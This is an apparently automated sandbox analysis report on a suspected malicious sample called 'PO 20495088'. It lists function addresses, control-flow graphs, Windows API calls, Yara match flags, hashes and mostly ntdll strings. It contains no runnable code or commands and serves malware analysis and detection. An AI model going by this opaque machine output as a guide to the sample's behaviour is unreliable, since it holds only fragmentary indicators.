                                                                                                        • Opcode ID: befa5f6f34f9cee2dfcb4ddb782e3837d240503cae1d937ae01bcb4aef58764c
                                                                                                        • Instruction ID: aed9606ee08badf7a23248ad7d5174f471a0b4191f1a393b34f8bfbd2925981e
                                                                                                        • Opcode Fuzzy Hash: befa5f6f34f9cee2dfcb4ddb782e3837d240503cae1d937ae01bcb4aef58764c
                                                                                                        • Instruction Fuzzy Hash: AC90023120558802D6107158C40874A400597D0301F5AC431A4424668DC6958A917222
                                                                                                        Function 017635C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 257 17635c0-17635cc LdrInitializeThunk
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 1806fd3bcd3bb71a097d62487ca7a5ce529e2411d6bb6ce6e707553ec6f249d6
                                                                                                        • Instruction ID: b4217b1437d65659a256b99a2095463e0f44cce8bd75ab5093f7e387ccb1db6f
                                                                                                        • Opcode Fuzzy Hash: 1806fd3bcd3bb71a097d62487ca7a5ce529e2411d6bb6ce6e707553ec6f249d6
                                                                                                        • Instruction Fuzzy Hash: EB90023160960402D60071588518706500597D0201F66C431A0424578DC7958B5166A3
                                                                                                        Function 0041426F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 151COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 0 41426f-414275 1 414277-414285 0->1 2 414298-41429a 0->2 3 414293-414295 1->3 4 414287-41428c 1->4 5 41429b-4142a0 2->5 3->2 4->5 6 41428e-414291 4->6 7 4142a2-4142aa 5->7 8 414307-41431e 5->8 6->3 9 414256-41426c 7->9 10 4142ac-4142ad 7->10 11 414320-414326 8->11 12 414346-414355 8->12 9->0 14 4142ba-4142cd 10->14 15 4142af-4142b6 10->15 16 414327 11->16 13 41435f-41436f 12->13 18 414371 13->18 19 4143af-41440a call 42e7d3 call 42f1e3 call 417a63 call 404773 call 425013 13->19 20 4142e6-414306 14->20 21 4142cf 14->21 15->14 16->16 17 41432a-414331 16->17 17->12 18->13 22 414373-414386 18->22 34 41442a-414430 19->34 35 41440c-41441b PostThreadMessageW 19->35 20->8 21->20 22->19 35->34 36 41441d-414427 35->36 36->34
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2583565669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_PO 20495088.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4t-S77XJ$4t-S77XJ
                                                                                                        • API String ID: 0-1546791543
                                                                                                        • Opcode ID: a8cb1c98fad871ba4acd92415a9dfdd6d89e2f2091ae0b8b045169520c2e8064
                                                                                                        • Instruction ID: 57812415c83f1eeb4dd1fb8259a154d59bcd12316cde13a9eea6d093cebd5724
                                                                                                        • Opcode Fuzzy Hash: a8cb1c98fad871ba4acd92415a9dfdd6d89e2f2091ae0b8b045169520c2e8064
                                                                                                        • Instruction Fuzzy Hash: 0641C071A05264AFCB11CBB4C881DDEBF79FE81354B98419AF8509B212D3389D42C799
                                                                                                        Function 004143A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61threadwindowCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 37 4143a0-4143b5 38 4143bd-41440a call 42f1e3 call 417a63 call 404773 call 425013 37->38 39 4143b8 call 42e7d3 37->39 48 41442a-414430 38->48 49 41440c-41441b PostThreadMessageW 38->49 39->38 49->48 50 41441d-414427 49->50 50->48
                                                                                                        APIs
                                                                                                        • PostThreadMessageW.USER32(4t-S77XJ,00000111,00000000,00000000), ref: 00414417
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2583565669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_PO 20495088.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: MessagePostThread
                                                                                                        • String ID: 4t-S77XJ$4t-S77XJ
                                                                                                        • API String ID: 1836367815-1546791543
                                                                                                        • Opcode ID: 518d4c305dcae2d0c0bb87346cad55eb47b2201c0fb4b699344f5d0501c39987
                                                                                                        • Instruction ID: e01f956661fa296123b7277eae4f9d03119acb04e94a79e76889ee77046c0cce
                                                                                                        • Opcode Fuzzy Hash: 518d4c305dcae2d0c0bb87346cad55eb47b2201c0fb4b699344f5d0501c39987
                                                                                                        • Instruction Fuzzy Hash: 7101DBB1D0015C7ADB10AAE59C81DFF7B7CDF40798F408069FA04B7101D6385F068BA5
                                                                                                        Function 004143A3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 51 4143a3-4143b5 52 4143bd-41440a call 42f1e3 call 417a63 call 404773 call 425013 51->52 53 4143b8 call 42e7d3 51->53 62 41442a-414430 52->62 63 41440c-41441b PostThreadMessageW 52->63 53->52 63->62 64 41441d-414427 63->64 64->62
                                                                                                        APIs
                                                                                                        • PostThreadMessageW.USER32(4t-S77XJ,00000111,00000000,00000000), ref: 00414417
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2583565669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_PO 20495088.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: MessagePostThread
                                                                                                        • String ID: 4t-S77XJ$4t-S77XJ
                                                                                                        • API String ID: 1836367815-1546791543
                                                                                                        • Opcode ID: 9b67e17b73a2ec9a0027e42da5ce894fb8761611dd09888ebcd52560db28d713
                                                                                                        • Instruction ID: c2a567a50c204fdefcaadb66068f5d76db29b644af593a6b8d74a1e94a921b44
                                                                                                        • Opcode Fuzzy Hash: 9b67e17b73a2ec9a0027e42da5ce894fb8761611dd09888ebcd52560db28d713
                                                                                                        • Instruction Fuzzy Hash: BD01D6B2D0015C7ADB10AAE59C81DEFBB7CDF40798F40806AFA04B7201E6385F0687A5
                                                                                                        Function 00417A56 Relevance: 1.5, APIs: 1, Instructions: 41libraryloaderCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 213 417a56-417a58 214 417a5a-417a8c call 42f313 213->214 215 417abd-417ac1 213->215 220 417a92-417aa0 call 42f913 214->220 221 417a8e-417a91 214->221 217 417ac3-417ad7 LdrLoadDll 215->217 218 417ada-417add 215->218 217->218 224 417ab0-417ac1 call 42ddc3 220->224 225 417aa2-417aad call 42fbb3 220->225 224->217 224->218 225->224
                                                                                                        APIs
                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417AD5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2583565669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_PO 20495088.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Load
                                                                                                        • String ID:
                                                                                                        • API String ID: 2234796835-0
                                                                                                        • Opcode ID: 00d74c54914e3674dfc88601c5f588642b460b76f1d93c50ac46ff01ae2bda70
                                                                                                        • Instruction ID: 94defb9d606960d9cf714c04d7a6df85f7efeeb467c247e03509e0413be65c8d
                                                                                                        • Opcode Fuzzy Hash: 00d74c54914e3674dfc88601c5f588642b460b76f1d93c50ac46ff01ae2bda70
                                                                                                        • Instruction Fuzzy Hash: A7F0C875E0420DABCF10CA90D881FEEB7B4EF54318F0042D6E94897191F234AB458755
                                                                                                        Function 0042CA53 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 235 42ca53-42ca91 call 404803 call 42d8e3 RtlFreeHeap
                                                                                                        APIs
                                                                                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,553FF0FC,00000007,00000000,00000004,00000000,0041734C,000000F4), ref: 0042CA8C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2583565669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_PO 20495088.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FreeHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 3298025750-0
                                                                                                        • Opcode ID: b6bd7ca4e5e2f84388774a009f0dfe0e79a0f95eabc0b97f502082f69398ed41
                                                                                                        • Instruction ID: 7a9adfbdafc9d372e4b0d836e5a148591e2a6c627619a2347af921981898e166
                                                                                                        • Opcode Fuzzy Hash: b6bd7ca4e5e2f84388774a009f0dfe0e79a0f95eabc0b97f502082f69398ed41
                                                                                                        • Instruction Fuzzy Hash: D8E092B26042147BD610EF99DC41E9B33ACEFC9710F004419FA08A7242C674BD10CBB8
                                                                                                        Function 0042CA03 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 230 42ca03-42ca44 call 404803 call 42d8e3 RtlAllocateHeap
                                                                                                        APIs
                                                                                                        • RtlAllocateHeap.NTDLL(?,0041E798,?,?,00000000,?,0041E798,?,?,?), ref: 0042CA3F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2583565669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_PO 20495088.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocateHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 1279760036-0
                                                                                                        • Opcode ID: 313aa5b546c07f93edee6525c96073c480a7a58352fffb5db240920bd29cf793
                                                                                                        • Instruction ID: 148a3c592597cf3907103853008aa0ac8dc69ac322b15dd753513c58fffbeea1
                                                                                                        • Opcode Fuzzy Hash: 313aa5b546c07f93edee6525c96073c480a7a58352fffb5db240920bd29cf793
                                                                                                        • Instruction Fuzzy Hash: 91E06D766042047BC610EE99EC41F9B73ACEFC8710F00451AFD08A7281D770BD108AB4
                                                                                                        Function 0042CA93 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 245 42ca93-42cacf call 404803 call 42d8e3 ExitProcess
                                                                                                        APIs
                                                                                                        • ExitProcess.KERNEL32(?,00000000,00000000,?,42C0B355,?,?,42C0B355), ref: 0042CACA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2583565669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_PO 20495088.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ExitProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 621844428-0
                                                                                                        • Opcode ID: 534d7e229a5d92930b19e2663a0179a7f59ebedcd9ad57d7a5ff33ff6e21fe6c
                                                                                                        • Instruction ID: 0820975280c14f995b631beb5a0ba1d08e772b4462a230f74f098af2566bdd33
                                                                                                        • Opcode Fuzzy Hash: 534d7e229a5d92930b19e2663a0179a7f59ebedcd9ad57d7a5ff33ff6e21fe6c
                                                                                                        • Instruction Fuzzy Hash: 03E02C326402107BC620FAAAEC01FEB736CCFC1314F40802AFA18A7242CA71B9018BF0
                                                                                                        Function 01762C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 250 1762c0a-1762c0f 251 1762c11-1762c18 250->251 252 1762c1f-1762c26 LdrInitializeThunk 250->252
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: f047e2743a81a55474f904c50166ff3456fee598ec76de90ea3facf75c6a067b
                                                                                                        • Instruction ID: 5fb6751b7ade4547c1a463c2ba43b53395e6f5b85dd39afc6bceeb6f3afdd017
                                                                                                        • Opcode Fuzzy Hash: f047e2743a81a55474f904c50166ff3456fee598ec76de90ea3facf75c6a067b
                                                                                                        • Instruction Fuzzy Hash: 86B09B719055C5C9DF52F764460C717B90477D0701F16C071D6030651F4738C1D1E276

                                                                                                        Non-executed Functions

                                                                                                        Function 017A2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                        • API String ID: 0-2160512332
                                                                                                        • Opcode ID: 8fe6c26c4ef9606fa69702e7f462ca7b353f04abcab65f2c125a845cd26a72b4
                                                                                                        • Instruction ID: b05875a2a1c3661bfa0dce776f2dfb8ca35786420657c314be24f075a91f212e
                                                                                                        • Opcode Fuzzy Hash: 8fe6c26c4ef9606fa69702e7f462ca7b353f04abcab65f2c125a845cd26a72b4
                                                                                                        • Instruction Fuzzy Hash: 4A926C71608342AFE721DF28C884B6BF7E8BB84754F444A2DFA94D7252D770E944CB92
                                                                                                        Function 01758620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • double initialized or corrupted critical section, xrefs: 01795508
                                                                                                        • Critical section address, xrefs: 01795425, 017954BC, 01795534
                                                                                                        • Thread identifier, xrefs: 0179553A
                                                                                                        • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017954CE
                                                                                                        • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0179540A, 01795496, 01795519
                                                                                                        • 8, xrefs: 017952E3
                                                                                                        • Invalid debug info address of this critical section, xrefs: 017954B6
                                                                                                        • corrupted critical section, xrefs: 017954C2
                                                                                                        • Thread is in a state in which it cannot own a critical section, xrefs: 01795543
                                                                                                        • Critical section address., xrefs: 01795502
                                                                                                        • Address of the debug info found in the active list., xrefs: 017954AE, 017954FA
                                                                                                        • undeleted critical section in freed memory, xrefs: 0179542B
                                                                                                        • Critical section debug info address, xrefs: 0179541F, 0179552E
                                                                                                        • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017954E2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                        • API String ID: 0-2368682639
                                                                                                        • Opcode ID: 82bf5b950202e646c90747a88940045a49bfb3b9c8e36785cd192feaba66c56c
                                                                                                        • Instruction ID: 059fa58a12d8bf5706f9680aeb64cb80ed48328f530afd5896dd40283c1ae5c8
                                                                                                        • Opcode Fuzzy Hash: 82bf5b950202e646c90747a88940045a49bfb3b9c8e36785cd192feaba66c56c
                                                                                                        • Instruction Fuzzy Hash: 00819DB1A00358EFEF21CF99C855BAEFBF5AB48704F20415AF904B7291D3B1A944CB61
                                                                                                        Function 017529F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 017924C0
                                                                                                        • @, xrefs: 0179259B
                                                                                                        • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01792602
                                                                                                        • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 017925EB
                                                                                                        • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01792409
                                                                                                        • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01792412
                                                                                                        • RtlpResolveAssemblyStorageMapEntry, xrefs: 0179261F
                                                                                                        • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01792498
                                                                                                        • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 017922E4
                                                                                                        • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01792506
                                                                                                        • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01792624
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                        • API String ID: 0-4009184096
                                                                                                        • Opcode ID: 1847a3f72c42a50c4b34d576a121c6d30ad8c96388d17de302894081c279d27c
                                                                                                        • Instruction ID: 0a73871d438f389c10f4cfa477aae95a6dade5123237f3d52e2e0798a1bf7c0e
                                                                                                        • Opcode Fuzzy Hash: 1847a3f72c42a50c4b34d576a121c6d30ad8c96388d17de302894081c279d27c
                                                                                                        • Instruction Fuzzy Hash: 950271F1D042299BDF61DB54CC84BD9F7B8AB54304F4041DAEA49A7243EB70AE84CF99
                                                                                                        Function 017C8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                        • API String ID: 0-2515994595
                                                                                                        • Opcode ID: 0255006c204b60f049dd1fe94d120493c52d1bc93651e73009743e5789e1350f
                                                                                                        • Instruction ID: 424885e97c3c6c5f589febec666c91ea01141018966b81f570c3032aa60b7966
                                                                                                        • Opcode Fuzzy Hash: 0255006c204b60f049dd1fe94d120493c52d1bc93651e73009743e5789e1350f
                                                                                                        • Instruction Fuzzy Hash: 9A51BD715143119BD339CF288844BABFBECEF98B50F14496DEA9AC3245E770D644CB92
                                                                                                        Function 017D0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                        • API String ID: 0-1700792311
                                                                                                        • Opcode ID: 13e2a0fd41de6a258305842781a817fd8cfe220d7a48521c181d8e8b14f0f0a6
                                                                                                        • Instruction ID: cd869c5d9dd4107611c4cd77b53a878a05802e1bcba8382563e1e070b6d1ba20
                                                                                                        • Opcode Fuzzy Hash: 13e2a0fd41de6a258305842781a817fd8cfe220d7a48521c181d8e8b14f0f0a6
                                                                                                        • Instruction Fuzzy Hash: 7BD1CA3560068ADFDB22DFACC444AAEFBF2FF4A710F189059F9469B256C7349981CB10
                                                                                                        Function 017A89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 017A8A3D
                                                                                                        • VerifierDebug, xrefs: 017A8CA5
                                                                                                        • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 017A8A67
                                                                                                        • HandleTraces, xrefs: 017A8C8F
                                                                                                        • VerifierDlls, xrefs: 017A8CBD
                                                                                                        • AVRF: -*- final list of providers -*- , xrefs: 017A8B8F
                                                                                                        • VerifierFlags, xrefs: 017A8C50
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                        • API String ID: 0-3223716464
                                                                                                        • Opcode ID: ff251fda238ea604ba7a93f008e79c40e2a70988d0d35125b213dcf754c16b75
                                                                                                        • Instruction ID: 54ca0973da4dbd26530540bdd30b5d7449d9a542f89f09b45a5b7129c684307f
                                                                                                        • Opcode Fuzzy Hash: ff251fda238ea604ba7a93f008e79c40e2a70988d0d35125b213dcf754c16b75
                                                                                                        • Instruction Fuzzy Hash: 25915873641302EFD721EF68C894B5BF7E8ABD9B15F840658FA41AB244C7709E40CB92
                                                                                                        Function 0172EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                        • API String ID: 0-1109411897
                                                                                                        • Opcode ID: 5c30c818792b354b2d10fcc43edb6c18a37993286a25eb4b201979290cd5506e
                                                                                                        • Instruction ID: db8752f54228dfca73b19b8220056b64f476c517fa7074d6b3c659b162ce584f
                                                                                                        • Opcode Fuzzy Hash: 5c30c818792b354b2d10fcc43edb6c18a37993286a25eb4b201979290cd5506e
                                                                                                        • Instruction Fuzzy Hash: 41A22974A0562A8FDB64DF18CC987A9FBB5AF45304F2442E9D90EA7254DB709EC1CF40
                                                                                                        Function 017563FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                        • API String ID: 0-792281065
                                                                                                        • Opcode ID: 06776754f938e88a5b7c5338a4f0c3c34f2fdffa24149eb3b3177e320f1d85c1
                                                                                                        • Instruction ID: 0c3004847f5ce77fa99c7647d61851295e718d9af79cd1004b30111cf45f3676
                                                                                                        • Opcode Fuzzy Hash: 06776754f938e88a5b7c5338a4f0c3c34f2fdffa24149eb3b3177e320f1d85c1
                                                                                                        • Instruction Fuzzy Hash: F2916C72B403169BDF35DF58E948BAAFBA5FB41B24F500168FE0167289D7B05A42CB90
                                                                                                        Function 0171645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01779A2A
                                                                                                        • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01779A01
                                                                                                        • LdrpInitShimEngine, xrefs: 017799F4, 01779A07, 01779A30
                                                                                                        • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 017799ED
                                                                                                        • apphelp.dll, xrefs: 01716496
                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01779A11, 01779A3A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                        • API String ID: 0-204845295
                                                                                                        • Opcode ID: 7b205d0ab8cf3f2d5f8bfcaead2ea71f9cec4d6e367157161515a76e577005e3
                                                                                                        • Instruction ID: a54c2a807c0ad568638060b8763c4b4af067afce1b187b9850018621e5a01c14
